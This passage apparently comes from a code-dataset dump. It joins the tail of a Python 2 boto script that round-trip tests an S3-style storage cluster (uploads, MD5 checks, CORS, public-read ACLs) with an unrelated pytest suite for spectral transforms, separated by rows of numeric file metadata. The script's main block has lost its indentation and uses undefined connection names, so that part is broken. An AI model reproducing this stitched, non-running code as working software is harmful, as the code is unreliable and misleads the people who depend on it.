        logger.error("Caught Exception in Get Bucket")
        logger.error(e)
    #Upload the File to Cluster, under the long prefix
    for key in objectDict.keys():
        time.sleep(1)
        try:
            obj_name = objectDict[key]
            objkey = bucket.new_key(longstrpath+obj_name)
            objkey.set_contents_from_filename(obj_name)
            logger.info("Uplaoded Special Char-->"+obj_name)
        except Exception, e:
            logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
            logger.error(e)
    #List Bucket
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.debug(objinfo)
    #Get the File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            objkey = bucket.get_key(longstrpath+objectDict[key])
            toFileName = 'getobjs/'+objectDict[key]
            #print toFileName
            objkey.get_contents_to_filename(toFileName)
        except Exception, e:
            logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
            logger.error(e)
    #Get the File From Cluster 1 (second connection)
    for key in objectDict.keys():
        time.sleep(1)
        try:
            objkey = bucket1.get_key(longstrpath+objectDict[key])
            toFileName = 'getobjs1/'+objectDict[key]
            #print toFileName
            objkey.get_contents_to_filename(toFileName)
        except Exception, e:
            logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
            logger.error(e)
    #Perform MD5sum of local vs copied file (connection 0)
    for key in objectDict.keys():
        try:
            #MD5 of Local Objects
            hash_md5_local = hashlib.md5()
            with open(objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_local.update(chunk)
            hash_md5_local_digest = hash_md5_local.hexdigest()
            #Md5 of Remote Objects
            hash_md5_remote = hashlib.md5()
            with open('getobjs/'+objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_remote.update(chunk)
            hash_md5_remote_digest = hash_md5_remote.hexdigest()
            if hash_md5_local_digest == hash_md5_remote_digest :
                logger.debug("MD5 Matches for Special")
            else:
                logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
                logger.error("Local MD5-> "+ hash_md5_local_digest)
                logger.error("Remote MD5-> "+ hash_md5_remote_digest)
        except Exception, e:
            logger.error("Exception While Handling Md5SUM")
            logger.error(e)
    #Perform MD5sum of local vs copied file (connection 1)
    for key in objectDict.keys():
        try:
            #MD5 of Local Objects
            hash_md5_local = hashlib.md5()
            with open(objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_local.update(chunk)
            hash_md5_local_digest = hash_md5_local.hexdigest()
            #Md5 of Remote Objects
            hash_md5_remote = hashlib.md5()
            with open('getobjs1/'+objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_remote.update(chunk)
            hash_md5_remote_digest = hash_md5_remote.hexdigest()
            if hash_md5_local_digest == hash_md5_remote_digest :
                logger.debug("MD5 Matches for Special 1")
            else:
                logger.error("MD5 MISMATCH for Object 1-> "+objectDict[key])
                logger.error("Local MD5 1 -> "+ hash_md5_local_digest)
                logger.error("Remote MD5 1-> "+ hash_md5_remote_digest)
        except Exception, e:
            logger.error("Exception While Handling Md5SUM")
            logger.error(e)
    #Delete File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            bucket.delete_key(longstrpath+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Deleting Object")
            logger.error(e)
    #Remove the File Locally
    for key in objectDict.keys():
        try:
            os.remove(objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object")
            logger.error(e)
    #Remove the File From both GetObj Dirs
    for key in objectDict.keys():
        try:
            os.remove('getobjs/'+objectDict[key])
            os.remove('getobjs1/'+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object from getObjs")
            logger.error(e)
    #List Bucket: any surviving key is a test failure
    logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.error("ERRORED: Object Found" + objinfo)
    #Finally Remove the Bucket
    try:
        s3_conn.delete_bucket(bucket_name)
        # NOTE(review): success is logged at ERROR level here (INFO elsewhere).
        logger.error("Bucket Deleted -> " + bucket_name)
    except Exception, e:
        logger.error("Exception while Deleting bucker ->" + bucket_name)
        logger.error(e)
def startObjectTest(s3_conn, s3_conn_1, sizeObj):
    """Round-trip test: create a random bucket, upload 128 random objects,
    read them back, MD5-compare local vs remote copies, then delete everything.
    `sizeObj` is accepted for signature parity but unused (sizes are random)."""
    # NOTE(review): 'ctr' is a module-level counter shared by several tests and
    # incremented without a lock — fine while the pool runs a single worker.
    global ctr
    logger.info("Start Object TEst Running Test for Iteration -> "+str(ctr))
    ctr = ctr + 1
    objectDict = {}
    bucket=0
    bucket1=0
    # Generate 128 random 32-character file names.
    for i in range (128):
        chars = string.letters + string.digits
        pwdSize = 32
        fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
        fileName = fileName + ".data"
        objectDict[i]=fileName
    #Print the Dict
    #for key in objectDict.keys():
        #print key, objectDict[key]
    #Create The Bucket
    chars = string.ascii_lowercase + string.digits
    pwdSize = 24
    bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
    logger.info("Bucket Name -> "+bucket_name)
    try:
        s3_conn.create_bucket(bucket_name)
    except Exception, e:
        logger.error("Bucket Name Create Exception -> "+bucket_name)
        logger.error(e)
        return
    logger.info("Bucket Created -> "+bucket_name)
    #Create the Object Locally (random size between 1 KB and ~900 KB)
    for key in objectDict.keys():
        try:
            size = random.randint(1024, 900000)
            with open(objectDict[key], "wb") as fout:
                fout.write(os.urandom(size))
        except Exception, e:
            logger.error("Caught Exception in Creating Data Objects")
            logger.error(e)
    try:
        bucket = s3_conn.get_bucket(bucket_name)
        bucket1 = s3_conn_1.get_bucket(bucket_name)
    except Exception, e:
        logger.error("Caught Exception in Get Bucket")
        logger.error(e)
    #Upload the File to Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            obj_name = objectDict[key]
            objkey = bucket.new_key(obj_name)
            objkey.set_contents_from_filename(obj_name)
            logger.info("Uploaded Object "+obj_name)
        except Exception, e:
            logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
            logger.error(e)
    #List Bucket
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.debug(objinfo)
    #Get the File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            objkey = bucket.get_key(objectDict[key])
            toFileName = 'getobjs/'+objectDict[key]
            #print toFileName
            objkey.get_contents_to_filename(toFileName)
            # NOTE(review): logs 'obj_name' (last uploaded key), not objectDict[key].
            logger.info("GOt Object from "+obj_name)
        except Exception, e:
            logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
            logger.error(e)
    #Perform MD5sum of local vs copied file
    for key in objectDict.keys():
        try:
            #MD5 of Local Objects
            hash_md5_local = hashlib.md5()
            with open(objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_local.update(chunk)
            hash_md5_local_digest = hash_md5_local.hexdigest()
            #Md5 of Remote Objects
            hash_md5_remote = hashlib.md5()
            with open('getobjs/'+objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_remote.update(chunk)
            hash_md5_remote_digest = hash_md5_remote.hexdigest()
            if hash_md5_local_digest == hash_md5_remote_digest :
                logger.info("MD5 Matches for ->" + objectDict[key])
            else:
                logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
                logger.error("Local MD5-> "+ hash_md5_local_digest)
                logger.error("Remote MD5-> "+ hash_md5_remote_digest)
        except Exception, e:
            logger.error("Exception While Handling Md5SUM")
            logger.error(e)
    #Delete File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            bucket.delete_key(objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Deleting Object")
            logger.error(e)
    #Remove the File Locally
    for key in objectDict.keys():
        try:
            os.remove(objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object")
            logger.error(e)
    #Remove the File From GetObj Dir
    for key in objectDict.keys():
        try:
            os.remove('getobjs/'+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object from getObjs")
            logger.error(e)
    #List Bucket: any surviving key is a test failure
    logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.error("ERRORED: Object Found" + objinfo)
    #Finally Remove the Bucket
    try:
        s3_conn.delete_bucket(bucket_name)
        logger.info("Bucket Deleted -> " + bucket_name)
    except Exception, e:
        logger.error("Exception while Deleting bucker ->" + bucket_name)
        logger.error(e)
def startaclcorstest(s3_conn, s3_conn_1, size):
    """CORS + canned-ACL test: create a bucket, set/read a CORS configuration,
    upload 16 fixed-size objects, set public-read ACLs on some, MD5-verify,
    then delete everything.  The `size` argument is overwritten below."""
    global ctr
    logger.info("Running Test for Iteration -> "+str(ctr))
    ctr = ctr + 1
    # Incoming `size` is ignored; every object is exactly 16345 bytes.
    size = 16345
    objectDict = {}
    for i in range (16):
        chars = string.letters + string.digits
        pwdSize = 32
        fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
        fileName = fileName + ".data"
        objectDict[i]=fileName
    #Print the Dict
    #for key in objectDict.keys():
        #print key, objectDict[key]
    #Create The Bucket
    chars = string.ascii_lowercase + string.digits
    pwdSize = 24
    bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
    logger.info("Bucket Name -> "+bucket_name)
    try:
        s3_conn.create_bucket(bucket_name)
    except Exception, e:
        logger.error("Bucket Name Create Exception -> "+bucket_name)
        logger.error(e)
        return
    logger.info("Bucket Created -> "+bucket_name)
    #Create the Object Locally
    for key in objectDict.keys():
        try:
            with open(objectDict[key], "wb") as fout:
                fout.write(os.urandom(size))
        except Exception, e:
            logger.error("Caught Exception in Creating Data Objects")
            logger.error(e)
    # NOTE(review): unlike the other tests these get_bucket calls are not
    # wrapped in try/except — a failure here propagates to the pool worker.
    bucket = s3_conn.get_bucket(bucket_name)
    bucket1 = s3_conn_1.get_bucket(bucket_name)
    logger.info("Now Setting the CORS CONFIG")
    try:
        cors_cfg = CORSConfiguration()
        cors_cfg.add_rule(['PUT', 'POST', 'DELETE'], 'https://www.example.com', allowed_header='*', max_age_seconds=3000, expose_header='x-amz-server-side-encryption')
        cors_cfg.add_rule('GET', '*')
        bucket.set_cors(cors_cfg)
        logger.info("Set Config CORS For Bucket Sucess ->"+bucket_name)
    except Exception, e:
        logger.error("Error in Setting Cors Config")
    logger.info("Lets Get the CORS CONFIG")
    try:
        l_cors_cfg = bucket.get_cors_xml()
        logger.info("got Cors Cfg")
        logger.info(l_cors_cfg)
    except Exception, e:
        logger.error("Error In Getting CORS CONFIG FOR BUCKET ->"+bucket_name)
    logger.info("Lets Get the CORS CONFIG 1")
    try:
        l_cors_cfg = bucket1.get_cors_xml()
        logger.info("got Cors Cfg1")
        logger.info(l_cors_cfg)
    except Exception, e:
        logger.error("Error In Getting CORS CONFIG FOR BUCKET ->"+bucket_name)
    #Upload the File to Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            obj_name = objectDict[key]
            objkey = bucket.new_key(obj_name)
            objkey.set_contents_from_filename(obj_name)
            logger.info("Suucess Uploading file to Cluster ->"+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
            logger.error(e)
    #List Bucket
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.debug(objinfo)
    #Get the File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            objkey = bucket.get_key(objectDict[key])
            toFileName = 'getobjs/'+objectDict[key]
            #print toFileName
            objkey.get_contents_to_filename(toFileName)
            logger.info("Success Getting file from Cluster ->"+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
            logger.error(e)
    #Get the File From Cluster1
    for key in objectDict.keys():
        time.sleep(1)
        try:
            objkey = bucket1.get_key(objectDict[key])
            # NOTE(review): downloads from the second connection overwrite the
            # 'getobjs/' copies (the other tests use 'getobjs1/') — confirm intent.
            toFileName = 'getobjs/'+objectDict[key]
            #print toFileName
            objkey.get_contents_to_filename(toFileName)
            logger.info("Success Getting file from Cluster 1->"+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
            logger.error(e)
    #Perform Set Acl Canned
    # NOTE(review): `ctr=0` here clobbers the module-level iteration counter
    # (declared `global ctr` above) to reuse it as a local toggle — likely
    # unintended.  Also, ctr becomes odd after the first key, so the `if`
    # body only ever runs once per loop.
    ctr=0
    for key in objectDict.keys():
        try:
            if ctr%2 == 0:
                objkey = bucket.get_key(objectDict[key])
                bucket.set_acl('public-read', objkey)
                logger.info("Set PUBLIC Canned ACl for -->"+objectDict[key])
                logger.info("Begin Lookup")
                getacl = objkey.get_acl()
                ctr = ctr + 1
                #
                #for grant in getacl.acl.grants:
                    #logger.info("Gpermission ->" + grant.permission)
                    #logger.info("G Display Name ->" + grant.display_name)
                    #logger.info("GEMail ID ->" + grant.email_address)
                    #logger.info("GID ->" + grant.id)
        except Exception, e:
            logger.error("Error In Setting Canned Acls")
    logger.info("Waiting for 3")
    time.sleep(3)
    #Perform Set Acl Canned 1 (second connection; same one-shot toggle)
    ctr=0
    for key in objectDict.keys():
        try:
            if ctr%2 == 0:
                objkey = bucket1.get_key(objectDict[key])
                bucket1.set_acl('public-read', objkey)
                logger.info("Set PUBLIC Canned ACl for 1 -->"+objectDict[key])
                logger.info("Begin Lookup")
                getacl = objkey.get_acl()
                logger.info("Link is-->" + bucket_name +"/" + objectDict[key])
                ctr = ctr + 1
                #
                #for grant in getacl.acl.grants:
                    #logger.info("Gpermission ->" + grant.permission)
                    #logger.info("G Display Name ->" + grant.display_name)
                    #logger.info("GEMail ID ->" + grant.email_address)
                    #logger.info("GID ->" + grant.id)
        except Exception, e:
            logger.error("Error In Setting Canned Acls 1")
    time.sleep(120)
    #Perform MD5sum of local vs copied file
    for key in objectDict.keys():
        try:
            #MD5 of Local Objects
            hash_md5_local = hashlib.md5()
            with open(objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_local.update(chunk)
            hash_md5_local_digest = hash_md5_local.hexdigest()
            #Md5 of Remote Objects
            hash_md5_remote = hashlib.md5()
            with open('getobjs/'+objectDict[key], "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5_remote.update(chunk)
            hash_md5_remote_digest = hash_md5_remote.hexdigest()
            if hash_md5_local_digest == hash_md5_remote_digest :
                logger.info("MD5 Matches for ->" +objectDict[key])
            else:
                logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
                logger.error("Local MD5-> "+ hash_md5_local_digest)
                logger.error("Remote MD5-> "+ hash_md5_remote_digest)
        except Exception, e:
            logger.error("Exception While Handling Md5SUM")
            logger.error(e)
    #Delete File From Cluster
    for key in objectDict.keys():
        time.sleep(1)
        try:
            bucket.delete_key(objectDict[key])
            logger.info("Success in Deleting Object from -> " +objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Deleting Object")
            logger.error(e)
    #Remove the File Locally
    for key in objectDict.keys():
        try:
            os.remove(objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object")
            logger.error(e)
    #Remove the File From GetObj Dir
    for key in objectDict.keys():
        try:
            os.remove('getobjs/'+objectDict[key])
        except Exception, e:
            logger.error("Caught Exception in Removing Object from getObjs")
            logger.error(e)
    #List Bucket: any surviving key is a test failure
    logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
    for objkey in bucket.list():
        objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
            size = objkey.size,
            modified = objkey.last_modified,
            )
        logger.error("ERRORED: Object Found" + objinfo)
    # Disabled bucket-public step, kept verbatim from the original:
    """
    try:
        logger.info("Now Trying to make the Bucket Public")
        bucket.set_acl('public-read')
        logger.info("Set the Bucket as Public")
    except Exception, e:
        logger.error("Exception in Setting Public Acl to the Bucket")
        logger.error(e)
    logger.info("Sleeping For Some Time Beofre Deleteing")
    """
    time.sleep(10)
    #Finally Remove the Bucket
    try:
        s3_conn.delete_bucket(bucket_name)
        # NOTE(review): success is logged at ERROR level here (INFO elsewhere).
        logger.error("Bucket Deleted -> " + bucket_name)
    except Exception, e:
        logger.error("Exception while Deleting bucker ->" + bucket_name)
        logger.error(e)
if __name__ == "__main__":
try:
src_conn = boto.connect_s3(aws_access_key_id='XXXXXXXXXXXX',
aws_secret_access_key='XXXXXXXXXx', host="XXXXXXXx",
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
print src_conn
dst_conn_1 = boto.connect_s3(aws_access_key_id='XXXXXXXXxx',
aws_secret_access_key='XXXXXXXXx', host="XXXXXXXXX",
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
print dst_conn
handle_thPool=ThreadPool(1)
while True:
#Do Forever or Until Conditions Breaks
handle_thPool.add_task(startObjectTest,[s3_conn,s3_conn_1,"4000",])
#handle_thPool.add_task(startObjectTest,[s3_conn,s3_conn_1,"4000",])
#handle_thPool.add_task(startSpecialObjectTest,[s3_conn,s3_conn_1,"200000",])
#handle_thPool.add_task(startMPUTest,[s3_conn,s3_conn_1,"200000",])
#handle_thPool.add_task(startaclcorstest,[s3_conn,s3_conn_1,"200000",])
except Exception, e:
print("Caught Exception in Main")
print e
| 35.71199
| 168
| 0.580111
| 3,367
| 28,891
| 4.858331
| 0.111375
| 0.065228
| 0.033011
| 0.057831
| 0.791478
| 0.777846
| 0.758589
| 0.73542
| 0.7246
| 0.717325
| 0
| 0.019869
| 0.320584
| 28,891
| 808
| 169
| 35.756188
| 0.81349
| 0.099547
| 0
| 0.746087
| 0
| 0
| 0.148158
| 0.009703
| 0.003478
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.027826
| null | null | 0.008696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82eca8312e2c0b103ba5df9aad7856414f22718e
| 9,363
|
py
|
Python
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin-python
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | 2
|
2021-05-27T16:49:59.000Z
|
2021-09-25T01:41:41.000Z
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin-python
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | 7
|
2021-05-03T15:55:32.000Z
|
2021-05-18T17:20:57.000Z
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin.py
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from pytest import approx
from numpy.testing import assert_array_almost_equal
from melvin import BasisFunctions, ArrayFactory, SpectralTransformer
@pytest.fixture
def periodic_coordinates(parameters):
    """Meshgrid on [0, 1) x [0, 1); endpoints excluded for periodic bases."""
    cfg = parameters
    x_axis = np.linspace(0, 1.0, cfg.nx, endpoint=False)
    z_axis = np.linspace(0, 1.0, cfg.nz, endpoint=False)
    X, Z = np.meshgrid(x_axis, z_axis, indexing="ij")
    return X, Z
@pytest.fixture
def coordinates(parameters):
    """Meshgrid on [0, 1] x [0, 1] with both endpoints included."""
    cfg = parameters
    x_axis = np.linspace(0, 1.0, cfg.nx)
    z_axis = np.linspace(0, 1.0, cfg.nz)
    X, Z = np.meshgrid(x_axis, z_axis, indexing="ij")
    return X, Z
def test_transform_periodic(arrays, st, periodic_coordinates):
    """A fully-periodic field round-trips through the spectral transformer."""
    spectral, physical = arrays
    X, Z = periodic_coordinates
    bases = [
        BasisFunctions.COMPLEX_EXP,
        BasisFunctions.COMPLEX_EXP,
    ]
    true_physical = np.cos(2 * np.pi * X) + 2.0 * np.sin(2 * 2 * np.pi * Z)
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    expected = np.zeros_like(spectral)
    # A real cosine splits its amplitude between the +k and -k exponentials.
    expected[1, 0] = 0.5
    expected[-1, 0] = 0.5  # complex conjugate mode
    # A real sine appears as a purely imaginary, negated coefficient.
    expected[0, 2] = -1.0j
    assert_array_almost_equal(spectral, expected)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_x_periodic_z(arrays, st, parameters):
    """Cosine basis in x combined with a complex-exponential basis in z."""
    spectral, physical = arrays
    nx, nz = parameters.nx, parameters.nz
    X, Z = np.meshgrid(
        np.linspace(0, 1.0, nx),
        np.linspace(0, 1.0, nz, endpoint=False),
        indexing="ij",
    )
    bases = [BasisFunctions.COSINE, BasisFunctions.COMPLEX_EXP]
    true_physical = np.cos(np.pi * X) + 2.0 * np.cos(2 * np.pi * X)
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    expected = np.zeros_like(spectral)
    # Each cosine mode appears at both +k and -k with its full amplitude.
    for mode, amplitude in ((1, 1.0), (2, 2.0), (-1, 1.0), (-2, 2.0)):
        expected[mode, 0] = amplitude
    assert_array_almost_equal(spectral, expected)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_periodic_x_cosine_z(arrays, st, parameters):
    """Complex-exponential basis in x combined with a cosine basis in z."""
    spectral, physical = arrays
    nx, nz = parameters.nx, parameters.nz
    X, Z = np.meshgrid(
        np.linspace(0, 1.0, nx, endpoint=False),
        np.linspace(0, 1.0, nz),
        indexing="ij",
    )
    bases = [BasisFunctions.COMPLEX_EXP, BasisFunctions.COSINE]
    true_physical = np.cos(np.pi * Z) + 2.0 * np.cos(2 * np.pi * Z)
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    expected = np.zeros_like(spectral)
    for mode, amplitude in ((1, 1.0), (2, 2.0)):
        expected[0, mode] = amplitude
    assert_array_almost_equal(spectral, expected)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_both(arrays, st, parameters):
    """Sums and products of cosine modes in both directions round-trip."""
    spectral, physical = arrays
    p = parameters
    xs = np.linspace(0, 1.0, p.nx, endpoint=True)
    zs = np.linspace(0, 1.0, p.nz, endpoint=True)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = (
        np.cos(np.pi * Z)
        + 2.0 * np.cos(2 * np.pi * Z)
        + np.cos(np.pi * X)
        + 2.0 * np.cos(2 * np.pi * X) * np.cos(1 * np.pi * Z)
    )
    bases = [BasisFunctions.COSINE, BasisFunctions.COSINE]
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    true_spectral = np.zeros_like(spectral)
    # Pure-z modes sit at x wavenumber zero.
    true_spectral[0, 1] = 1.0
    true_spectral[0, 2] = 2.0
    # x modes appear at +/- the x wavenumber with the same sign (even symmetry).
    true_spectral[1, 0] = 1.0
    true_spectral[-1, 0] = 1.0
    true_spectral[2, 1] = 2.0
    true_spectral[-2, 1] = 2.0
    assert_array_almost_equal(spectral, true_spectral)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_sine_both(arrays, st, parameters):
    """Products of sine modes in both directions round-trip exactly."""
    spectral, physical = arrays
    p = parameters
    xs = np.linspace(0, 1.0, p.nx, endpoint=True)
    zs = np.linspace(0, 1.0, p.nz, endpoint=True)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = np.sin(np.pi * Z) * np.sin(np.pi * X) + 2.0 * np.sin(
        2 * np.pi * Z
    ) * np.sin(3 * np.pi * X)
    bases = [BasisFunctions.SINE, BasisFunctions.SINE]
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    true_spectral = np.zeros_like(spectral)
    # Sine is odd in x: the negative x wavenumber carries the opposite sign.
    for x_mode, z_mode, amplitude in ((1, 1, 1.0), (3, 2, 2.0)):
        true_spectral[x_mode, z_mode] = amplitude
        true_spectral[-x_mode, z_mode] = -amplitude
    assert_array_almost_equal(spectral, true_spectral)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_sine_x_periodic_z(arrays, st, parameters):
    """Sine modes in x with a periodic z direction round-trip exactly."""
    spectral, physical = arrays
    p = parameters
    xs = np.linspace(0, 1.0, p.nx, endpoint=True)
    zs = np.linspace(0, 1.0, p.nz, endpoint=False)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = np.sin(np.pi * X) + 2.0 * np.sin(2 * np.pi * X)
    bases = [BasisFunctions.SINE, BasisFunctions.COMPLEX_EXP]
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    true_spectral = np.zeros_like(spectral)
    for mode, amplitude in ((1, 1.0), (2, 2.0)):
        true_spectral[mode, 0] = amplitude
        # x is sine: the complex conjugate mode is negated.
        true_spectral[-mode, 0] = -amplitude
    assert_array_almost_equal(spectral, true_spectral)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_sine_x_cosine_z(arrays, st, parameters):
    """Sine modes in x against a cosine z basis round-trip exactly."""
    spectral, physical = arrays
    p = parameters
    xs = np.linspace(0, 1.0, p.nx, endpoint=True)
    zs = np.linspace(0, 1.0, p.nz, endpoint=True)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = np.sin(np.pi * X) + 2.0 * np.sin(2 * np.pi * X)
    bases = [BasisFunctions.SINE, BasisFunctions.COSINE]
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    true_spectral = np.zeros_like(spectral)
    for mode, amplitude in ((1, 1.0), (2, 2.0)):
        true_spectral[mode, 0] = amplitude
        # x is sine: the complex conjugate mode is negated.
        true_spectral[-mode, 0] = -amplitude
    assert_array_almost_equal(spectral, true_spectral)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_x_sine_z(arrays, st, parameters):
    """Cosine-in-x times sine-in-z products round-trip exactly."""
    spectral, physical = arrays
    p = parameters
    xs = np.linspace(0, 1.0, p.nx, endpoint=True)
    zs = np.linspace(0, 1.0, p.nz, endpoint=True)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = (
        np.cos(np.pi * X) * np.sin(np.pi * Z)
        + 2.0 * np.cos(3 * np.pi * X) * np.sin(2 * np.pi * Z)
        + 3.0 * np.sin(2 * np.pi * Z)
    )
    bases = [BasisFunctions.COSINE, BasisFunctions.SINE]
    st.to_spectral(true_physical, spectral, basis_functions=bases)
    true_spectral = np.zeros_like(spectral)
    # x is cosine: +/- x wavenumbers share the same sign.
    true_spectral[1, 1] = 1.0
    true_spectral[-1, 1] = 1.0
    true_spectral[3, 2] = 2.0
    true_spectral[-3, 2] = 2.0
    # Pure-z sine term sits at x wavenumber zero.
    true_spectral[0, 2] = 3.0
    assert_array_almost_equal(spectral, true_spectral)
    st.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
def test_transform_periodic_x_fdm_z(fdm_parameters):
    """Periodic x transform with an FDM z basis keeps coefficients constant in z."""
    p = fdm_parameters
    factory = ArrayFactory(fdm_parameters, np)
    transformer = SpectralTransformer(fdm_parameters, np, array_factory=factory)
    spectral = factory.make_spectral()
    physical = factory.make_physical()
    xs = np.linspace(0, 1.0, p.nx, endpoint=False)
    zs = np.linspace(0, 1.0, p.nz)
    X, Z = np.meshgrid(xs, zs, indexing="ij")
    true_physical = 3.0 + np.cos(2 * np.pi * X) + 2.0 * np.cos(2 * 2 * np.pi * X)
    bases = [BasisFunctions.COMPLEX_EXP, BasisFunctions.FDM]
    transformer.to_spectral(true_physical, spectral, basis_functions=bases)
    # FDM keeps physical z points, so each x coefficient fills a whole row;
    # cosine amplitudes split in half between +k and -k exponentials.
    true_spectral = np.zeros_like(spectral)
    true_spectral[0, :] = 3.0
    true_spectral[1, :] = 1.0 / 2
    true_spectral[2, :] = 2.0 / 2
    assert_array_almost_equal(spectral, true_spectral)
    transformer.to_physical(spectral, physical, basis_functions=bases)
    assert_array_almost_equal(physical, true_physical)
| 26.82808
| 77
| 0.640073
| 1,332
| 9,363
| 4.313063
| 0.065315
| 0.112794
| 0.015666
| 0.041775
| 0.868755
| 0.856571
| 0.854656
| 0.84282
| 0.838468
| 0.815144
| 0
| 0.034792
| 0.238706
| 9,363
| 348
| 78
| 26.905172
| 0.771184
| 0.038129
| 0
| 0.719368
| 0
| 0
| 0.002223
| 0
| 0
| 0
| 0
| 0
| 0.075099
| 1
| 0.043478
| false
| 0
| 0.019763
| 0
| 0.071146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d238c50f355bd558a2d9be4903fe2fbd247c63c2
| 73,798
|
py
|
Python
|
social_capital/adv_cred_functions.py
|
zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
social_capital/adv_cred_functions.py
|
